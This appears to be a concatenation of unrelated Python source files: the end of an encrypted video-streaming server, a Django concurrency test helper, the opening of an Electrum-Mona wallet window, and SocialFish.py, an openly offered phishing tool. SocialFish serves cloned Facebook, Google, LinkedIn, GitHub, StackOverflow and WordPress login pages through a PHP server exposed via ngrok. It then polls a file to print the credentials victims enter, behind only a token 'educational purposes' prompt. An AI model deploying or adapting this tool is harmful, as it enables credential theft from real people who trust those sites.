while stream and not abort:
# img,frame = vid.read()
data = await reader.read(1024)
if data == b'READY':
# print("got a READY")
with lock:
# print("got LOCK")
serializedFrame = pickle.dumps(outputFrame)
# print("serializedFrame")
# print(serializedFrame[:10])
encr_serializedFrame = encrypt(derived_key, serializedFrame, derived_iv)
# print("encr_serializedFrame")
# print(encr_serializedFrame[:10])
message = derived_session_id
bytes_component_id = component_id.to_bytes(4, "big")
message += bytes_component_id
# when width was 800
# 1200165 when aspect ratio was 16:10
# 1080165 when aspect ratio was 16:9
# print("len encr_serializedFrame")
# print(len(encr_serializedFrame))
message += struct.pack("Q", len(encr_serializedFrame))+encr_serializedFrame
# Make an hmac for message
h = hmac.HMAC(derived_hmac_key, hashes.SHA256())
h.update(message)
message_hmac = h.finalize()
message = message_hmac + message
# print(struct.pack("Q",len(encr_serializedFrame)))
# message = len(serializedFrame).to_bytes(8, "big")+serializedFrame
# print(len(serializedFrame).to_bytes(8, "big"))
# print("sending FRAME")
writer.write(message)
await writer.drain()
component_id += 1
elif data == b'LEAVING':
break
if outputFrame is not None:
pass
# # Show the image, debugging
# cv2.imshow('SERVER STREAMING VIDEO',outputFrame)
# # Way to close the feed, required for imshow to work properly
# key = cv2.waitKey(1) & 0xFF
# if key ==ord('q') or not stream:
# # client_socket.close()
# break
except KeyboardInterrupt:
client_logger.info("Client Task was canceled")
stream = False
loop.stop()
except asyncio.TimeoutError:
client_logger.info('Client Timed out')
except ConnectionResetError:
        client_logger.info('Client left unexpectedly')
finally:
writer.close()
client_logger.info('Connection Closed')
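# Hedged sketch (not part of the original file) of how a receiving client might
# split one frame produced in new_client() above. The layout written there is:
# 32-byte HMAC-SHA256 tag, 32-byte session id, 4-byte big-endian component id,
# 8-byte native-order ("Q") length prefix, then the AES-OFB ciphertext.
def _example_parse_frame(frame, derived_hmac_key):
    tag, body = frame[:32], frame[32:]
    h = hmac.HMAC(derived_hmac_key, hashes.SHA256())
    h.update(body)
    h.verify(tag)  # raises cryptography.exceptions.InvalidSignature on tampering
    session_id = body[:32]
    component_id = int.from_bytes(body[32:36], "big")
    (payload_len,) = struct.unpack("Q", body[36:44])
    ciphertext = body[44:44 + payload_len]
    return session_id, component_id, ciphertext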
async def boot_server(host_ip, port):
server = await asyncio.start_server(new_client, port=port, host=host_ip)
# async with server:
await server.serve_forever()
def str2bool(arg):
if isinstance(arg, bool):
return arg
if arg.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif arg.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError("Boolean value expected:\n\t'yes', 'true', 't', 'y', '1', 'no', 'false', 'f', 'n', '0'") # noqa: E501
if __name__ == '__main__':
# Setup Logging
main_logger_Format = '{"Timestamp":"%(asctime)s", "Logger":"%(name)s", "Level":"%(levelname)s", "Message":"%(message)s"}' # noqa: E501
main_logger = logging.getLogger("main")
main_logger_ch = logging.StreamHandler()
main_formatter = logging.Formatter(main_logger_Format)
main_logger.setLevel(logging.WARNING)
main_logger_ch.setLevel(logging.WARNING)
client_logger_Format = '{"Timestamp":"%(asctime)s", "Logger":"%(name)s", "Level":"%(levelname)s", "ClientIP":"%(clientip)s", "ClientPort":"%(clientport)s", "Message":"%(message)s"}' # noqa: E501
client_logger = logging.getLogger("client")
client_logger_ch = logging.StreamHandler()
client_formatter = logging.Formatter(client_logger_Format)
client_logger.setLevel(logging.WARNING)
client_logger_ch.setLevel(logging.WARNING)
# Handle arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--host-ip", type=str, required=False,
help="ip address to serve on, default: 127.0.0.1", default='127.0.0.1')
ap.add_argument("-p", "--port", type=int, required=False,
help="port number to listen to, default: 9898", default=9898)
ap.add_argument("--pki-host-ip", type=str, required=False,
help="ip address of the PKI server to connect to, default: 127.0.0.1", default='127.0.0.1')
ap.add_argument("--pki-port", type=int, required=False,
help="PKI port number to connect to, default: 7777", default=7777)
ap.add_argument("--rsa-pub-key", type=str, required=False,
help="Path to RSA PEM public key, default: env/keys/server/public-key.pem", default='env/keys/server/public-key.pem')
ap.add_argument("--rsa-priv-key", type=str, required=False,
help="Path to RSA PEM private key, default: env/keys/server/private-key.pem", default='env/keys/server/private-key.pem')
ap.add_argument("--disable-ecdh", type=str2bool, required=False,
help="Disable Elliptic Curve key generation for Diffie-Hellman Key Exchange, default: False", default=False)
ap.add_argument("--restricted", type=str2bool, required=False,
help="Enable restricted mode, requires --whitelist argument, default: False", default=False)
ap.add_argument("--whitelist", type=str, required=False,
help="Path to folder containing trusted public keys, default: env/keys/server/trusted_keys", default="env/keys/server/trusted_keys")
ap.add_argument("-l", "--log-level", type=str, required=False,
help="Level of logging: info, debug, warning, error, default: warning", default='warning')
args = vars(ap.parse_args())
if (args["log_level"].lower() not in ["info", "warning", "debug", "error"]):
        ap.error('Unexpected log level entered. Valid choices are: info, error, warning, debug')
if args["log_level"].lower() == "info":
main_logger.setLevel(logging.INFO)
main_logger_ch.setLevel(logging.INFO)
client_logger.setLevel(logging.INFO)
client_logger_ch.setLevel(logging.INFO)
elif args["log_level"].lower() == "warning":
main_logger.setLevel(logging.WARNING)
main_logger_ch.setLevel(logging.WARNING)
client_logger.setLevel(logging.WARNING)
client_logger_ch.setLevel(logging.WARNING)
elif args["log_level"].lower() == "debug":
main_logger.setLevel(logging.DEBUG)
main_logger_ch.setLevel(logging.DEBUG)
client_logger.setLevel(logging.DEBUG)
client_logger_ch.setLevel(logging.DEBUG)
elif args["log_level"].lower() == "error":
main_logger.setLevel(logging.ERROR)
main_logger_ch.setLevel(logging.ERROR)
client_logger.setLevel(logging.ERROR)
client_logger_ch.setLevel(logging.ERROR)
main_logger_ch.setFormatter(main_formatter)
main_logger.addHandler(main_logger_ch)
client_logger_ch.setFormatter(client_formatter)
client_logger.addHandler(client_logger_ch)
if (args["restricted"] and args["whitelist"] == "env/keys/server/trusted_keys"):
main_logger.warning('The --restricted argument is being run with the default whitelist')
restricted = args["restricted"]
if args["restricted"]:
main_logger.info("Server is running in restricted mode, setting up whitelist...")
# For every file in whitelist directory
filenames = [f for f in os.listdir(args["whitelist"]) if os.path.isfile(os.path.join(args["whitelist"], f))]
# Load the public key and add it to whitelist
for pubkfile in filenames:
RSA_trusted_client_public_key = None
with open(os.path.join(args["whitelist"], pubkfile), "rb") as key_file:
RSA_trusted_client_public_key = load_pem_public_key(
key_file.read()
)
            serialized_RSA_trusted_client_public_key = RSA_trusted_client_public_key.public_bytes(
                Encoding.PEM, PublicFormat.SubjectPublicKeyInfo)
            trusted_keys_whitelist[serialized_RSA_trusted_client_public_key] = "Trusted"
main_logger.info(f"{len(trusted_keys_whitelist)} Public Key(s) loaded into whitelist")
main_logger.debug(f"trusted_keys_whitelist = {trusted_keys_whitelist}")
disable_ecdh = args["disable_ecdh"]
if disable_ecdh:
main_logger.info("ECDH is disabled, using DSA keys with Diffie-Hellman")
else:
main_logger.info("Using ECDH for key exchange")
RSA_server_public_key = None
RSA_server_private_key = None
with open(args["rsa_pub_key"], "rb") as key_file:
RSA_server_public_key = load_pem_public_key(
key_file.read()
)
with open(args["rsa_priv_key"], "rb") as key_file:
RSA_server_private_key = load_pem_private_key(
key_file.read(),
password=None,
)
# Serialize keys
serialized_RSA_server_public_key = RSA_server_public_key.public_bytes(Encoding.PEM,
PublicFormat.SubjectPublicKeyInfo)
# ## --------- PKI Register Pub Keys START-----------##
# pki_client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# pki_host_ip = args["pki_host_ip"]
# pki_port = args["pki_port"]
# pki_client_socket.connect((pki_host_ip,pki_port))
# response = registerPublicKey(pki_client_socket, serialized_RSA_server_public_key, RSA_server_private_key)
# print("response:", response)
# pki_client_socket.close()
# ## --------- PKI Register Pub Keys END -----------##
main_logger.info("Setting up server...")
host_ip = args["host_ip"]
port = args["port"]
socket_address = (host_ip, port)
cap_frame_thread = threading.Thread(target=capture_frames, args=(), name='capture_frames', daemon=False)
cap_frame_thread.start()
threads = []
main_logger.info(f"LISTENING AT: {socket_address}")
loop = asyncio.get_event_loop()
loop.create_task(boot_server(host_ip, port))
try:
loop.run_forever()
except KeyboardInterrupt:
main_logger.info("Server is manually shutting down")
stream = False
cap_frame_thread.join()
finally:
main_logger.info("Shutting Down Server")
# try:
# loop.stop()
# loop.run_until_complete(loop.shutdown_asyncgens())
# try:
# # loop.stop()
# pending = asyncio.all_tasks()
# for task in penging:
# task.cancel()
# with suppress(asyncio.CancelledError):
# loop.run_until_complete(task)
# # loop.stop()
# # loop.run_until_complete(loop.shutdown_asyncgens())
# try:
# loop.stop()
# pending = asyncio.all_tasks()
# loop.run_until_complete(asyncio.gather(*pending))
try:
loop.stop()
pending = asyncio.all_tasks()
for task in pending:
task.cancel()
main_logger.debug("Lagging client task has been cancelled")
with suppress(asyncio.CancelledError):
loop.run_until_complete(task)
# loop.run_until_complete(asyncio.gather(*pending))
except RuntimeError as e:
if e.args[0] == 'no running event loop':
main_logger.debug("All Client Connections have been closed already")
pass
else:
raise e
|
SocialFish.py
|
#-*- coding: utf-8 -*-
# SOCIALFISH
# by: UNDEADSEC
#
###########################
from time import sleep
from sys import stdout, exit
from os import system, path
import multiprocessing
from urllib import urlopen
from platform import architecture
from wget import download
RED, WHITE, CYAN, GREEN, END = '\033[91m', '\33[46m', '\033[36m', '\033[1;32m', '\033[0m'
def connected(host='http://duckduckgo.com'):
try:
urlopen(host)
return True
except:
return False
if connected() == False:
print '''
....._____....... ____ ____ ____ _ ____ _ ____ _ ____ _ _
/ \/| [__ | | | | |__| | |___ | [__ |__|
\o__ /\| ___] |__| |___ | | | |___ | | ___] | |
\|
{0}[{1}!{0}]{1} Network error. Verify your connection.\n
'''.format(RED, END)
exit(0)
def checkNgrok():
if path.isfile('Server/ngrok') == False:
print '[*] Downloading Ngrok...'
if architecture()[0] == '64bit':
filename = 'ngrok-stable-linux-amd64.zip'
else:
filename = 'ngrok-stable-linux-386.zip'
url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
download(url)
system('unzip ' + filename)
system('mv ngrok Server/ngrok')
system('rm -Rf ' + filename)
system('clear')
checkNgrok()
def end():
system('clear')
print '''
S O C I A L{2}
|\ \ \ \ \ \ \ \ __ ___
| \ \ \ \ \ \ \ \ | O~-_ _-~~ ~~-_
| >----|-|-|-|-|-|-|--| __/ / {1}DON'T{2} )
| / / / / / / / / |__\ < {1}FORGET{2} )
|/ / / / / / / / \_ {1}ME !{2} _)
{1}F I S H{2} ~--___--~
{1}[ {0}Watch us on YouTube:{1} https://youtube.com/c/UndeadSec ]
[ {0}Follow me on Twitter:{1} https://twitter.com/A1S0N_ ]
[ {0}Contribute on Github:{1} https://github.com/UndeadSec/SocialFish ]
[ {0}Join our Telegram Group(Portuguese):{1} https://t.me/UndeadSec ]\n'''.format(GREEN, END, CYAN)
def loadModule(module):
print '''{0}
_.-=-._ .-,
.' "-.,' /
( _. <
`=.____.=" `._\\
[{1}*{0}]{1} %s module loaded.{0}'''.format(CYAN, END) % module
def runPhishing(social, option2):
system('sudo rm -Rf Server/www/*.* && touch Server/www/cat.txt')
if option2 == '1' and social == 'Facebook':
system('cp WebPages/fb_standard/*.* Server/www/')
if option2 == '2' and social == 'Facebook':
system('cp WebPages/fb_advanced_poll/*.* Server/www/')
elif option2 == '1' and social == 'Google':
system('cp WebPages/google_standard/*.* Server/www/')
elif option2 == '2' and social == 'Google':
system('cp WebPages/google_advanced_poll/*.* Server/www/')
elif social == 'LinkedIN':
system('cp WebPages/linkedin/*.* Server/www/')
elif social == 'Github':
system('cp WebPages/github/*.* Server/www/')
elif social == 'StackOverflow':
system('cp WebPages/stackoverflow/*.* Server/www/')
elif social == 'WordPress':
system('cp WebPages/wordpress/*.* Server/www/')
def waitCreds():
print " {0}[{1}*{0}]{1} Waiting for credentials... \n".format(GREEN, END)
while True:
with open('Server/www/cat.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
print ' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines
system('rm -rf Server/www/cat.txt && touch Server/www/cat.txt')
creds.close()
def runPEnv():
system('clear')
print ''' {2}-{1} UNDEADSEC {2}|{1} t.me/UndeadSec {2}|{1} youtube.com/c/UndeadSec {2}- BRAZIL
'
' '
' '
. ' . ' '
' ' ' ' '
███████ ████████ ███████ ██ ███████ ██ ███████ ██ ███████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ██ ██ ██ ██ ███████ ██ █████ ██ ███████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ████████ ███████ ██ ██ ██ ███████ ██ ██ ███████ ██ ██
. ' '....' ..'. ' .
' . . ' ' ' {1}v1.0{2}
' . . . . . '. .' ' .
' ' '. ' {1}Twitter: https://twitter.com/A1S0N_{2}
' ' '
' . '
'
{1}'''.format(GREEN, END, CYAN)
for i in range(101):
sleep(0.01)
stdout.write("\r{0}[{1}*{0}]{1} Preparing environment... %d%%".format(CYAN, END) % i)
stdout.flush()
print "\n\n{0}[{1}*{0}]{1} Searching for PHP installation... ".format(CYAN, END)
if 256 != system('which php'):
print " --{0}>{1} OK.".format(CYAN, END)
else:
print " --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again. http://www.php.net/".format(RED, END)
exit(0)
if raw_input(" {0}[{1}!{0}]{1} Do you will use this tool only for educational purposes? (y/n)\n {2}SF > {1}".format(RED, END, CYAN)).upper() == 'N':
system('clear')
print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL{1} ]\n'.format(RED, END)
exit(0)
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIN\n\n {0}[{1}4{0}]{1} Github\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}SF > {1}".format(CYAN, END))
if option == '1':
loadModule('Facebook')
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END))
runPhishing('Facebook', option2)
elif option == '2':
loadModule('Google')
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END))
runPhishing('Google', option2)
elif option == '3':
loadModule('LinkedIN')
option2 = ''
runPhishing('LinkedIN', option2)
elif option == '4':
loadModule('Github')
option2 = ''
runPhishing('Github', option2)
elif option == '5':
loadModule('StackOverflow')
option2 = ''
runPhishing('StackOverflow', option2)
elif option == '6':
loadModule('WordPress')
option2 = ''
runPhishing('WordPress', option2)
else:
exit(0)
def runNgrok():
system('./Server/ngrok http 80 > /dev/null &')
sleep(10)
system('curl -s http://127.0.0.1:4040/status | grep -P "https://.*?ngrok.io" -oh > ngrok.url')
url = open('ngrok.url', 'r')
print('\n {0}[{1}*{0}]{1} Ngrok URL: {2}' + url.readlines()[0] + '{1}').format(CYAN, END, GREEN)
url.close()
def runServer():
system("cd Server/www/ && sudo php -S 127.0.0.1:80")
if __name__ == "__main__":
try:
runPEnv()
runNgrok()
multiprocessing.Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
system('pkill -f ngrok')
end()
exit(0)
|
util.py
|
from django import db
import itertools
import pytest
from contextlib import contextmanager
from demo.models import (
AutoIncConcurrentModel, ConcreteModel, CustomSaveModel, InheritedModel, ProxyModel,
SimpleConcurrentModel, TriggerConcurrentModel
)
from functools import partial, update_wrapper
from itertools import count
from concurrency.config import conf
def sequence(prefix):
infinite = itertools.count()
while 1:
yield "{0}-{1}".format(prefix, next(infinite))
nextname = sequence('username')
nextgroup = sequence('group')
unique_id = count(1)
def override_conf(**kwargs):
for key, new_value in kwargs.items():
setattr(conf, key, new_value)
def clone_instance(model_instance):
"""
    Returns a copy of the passed instance.
    .. warning: All fields are copied, even the primary key
    :param model_instance: :py:class:`django.db.models.Model` instance
:return: :py:class:`django.db.models.Model` instance
"""
fieldnames = [fld.name for fld in model_instance._meta.fields]
new_kwargs = {name: getattr(model_instance, name) for name in fieldnames}
return model_instance.__class__(**new_kwargs)
def with_models(*models, **kwargs):
ignore = kwargs.pop('ignore', [])
if ignore:
        models = [m for m in models if m not in ignore]
ids = [m.__name__ for m in models]
return pytest.mark.parametrize(('model_class,'),
models,
False,
ids,
None)
MODEL_CLASSES = [SimpleConcurrentModel, AutoIncConcurrentModel,
InheritedModel, CustomSaveModel,
ConcreteModel, ProxyModel, TriggerConcurrentModel]
with_std_models = partial(with_models, SimpleConcurrentModel, AutoIncConcurrentModel,
InheritedModel, CustomSaveModel,
ConcreteModel, ProxyModel)()
with_all_models = partial(with_models, *MODEL_CLASSES)()
# with_all_models = partial(models_parametrize, ConcreteModel)()
DELETE_ATTRIBUTE = object()
@pytest.fixture(params=MODEL_CLASSES)
def concurrent_model(request):
return request.param
@contextmanager
def attributes(*values):
"""
context manager to temporary set/delete object's attributes
    :param values: tuples of (target, name, value)
Es.
with attributes((django.contrib.admin.ModelAdmin, 'list_per_page', 200)):
...
with attributes((django.contrib.admin.ModelAdmin, 'list_per_page', DELETE_ATTRIBUTE)):
...
"""
def _set(target, name, value):
if value is DELETE_ATTRIBUTE:
delattr(target, name)
else:
setattr(target, name, value)
backups = []
for target, name, value in values:
if hasattr(target, name):
backups.append((target, name, getattr(target, name)))
else:
backups.append((target, name, getattr(target, name, DELETE_ATTRIBUTE)))
_set(target, name, value)
yield
for target, name, value in backups:
_set(target, name, value)
def concurrently(times=1):
# from: http://www.caktusgroup.com/blog/2009/05/26/testing-django-views-for-concurrency-issues/
"""
Add this decorator to small pieces of code that you want to test
concurrently to make sure they don't raise exceptions when run at the
same time. E.g., some Django views that do a SELECT and then a subsequent
INSERT might fail when the INSERT assumes that the data has not changed
since the SELECT.
"""
def concurrently_decorator(test_func):
def wrapper(*args, **kwargs):
exceptions = []
import threading
def call_test_func():
try:
test_func(*args, **kwargs)
except Exception as e:
exceptions.append(e)
raise
finally:
db.connection.close()
threads = []
for i in range(times):
threads.append(threading.Thread(target=call_test_func))
for t in threads:
t.start()
for t in threads:
t.join()
if exceptions:
raise Exception(
'test_concurrently intercepted %s exceptions: %s' %
(len(exceptions), exceptions))
return update_wrapper(wrapper, test_func)
return concurrently_decorator
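# Hedged usage sketch (not part of the original file): running a small query
# from five threads at once via the decorator above; exceptions from any thread
# are collected and re-raised as a single aggregated Exception.
def _example_concurrently_usage():
    @concurrently(times=5)
    def _snippet():
        list(SimpleConcurrentModel.objects.all())
    _snippet()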
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum_mona
from electrum_mona import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_mona.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_mona.plugin import run_hook
from electrum_mona.i18n import _
from electrum_mona.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, InvoiceError)
from electrum_mona.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum_mona.lnutil import PaymentFailure, SENT, RECEIVED
from electrum_mona.transaction import Transaction, TxOutput
from electrum_mona.address_synchronizer import AddTransactionException
from electrum_mona.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_mona.version import ELECTRUM_VERSION
from electrum_mona.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_mona.exchange_rate import FxThread
from electrum_mona.simple_config import SimpleConfig
from electrum_mona.logging import Logger
from electrum_mona.util import PR_PAID, PR_UNPAID, PR_INFLIGHT, PR_FAILED
from electrum_mona.util import pr_expiration_values
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
if TYPE_CHECKING:
from . import ElectrumGui
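# maximum number of routing attempts made when paying a Lightning invoice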
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
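    # allow activating the button with the Return key when it has keyboard focus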
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.send_tab_is_onchain = False
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
#self.channels_tab = self.create_channels_tab(wallet)
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
#if self.wallet.has_lightning():
# add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
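            # bind the current value of i via a default argument so each Alt+N shortcut selects its own tab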
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'invoice_status', 'request_status']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
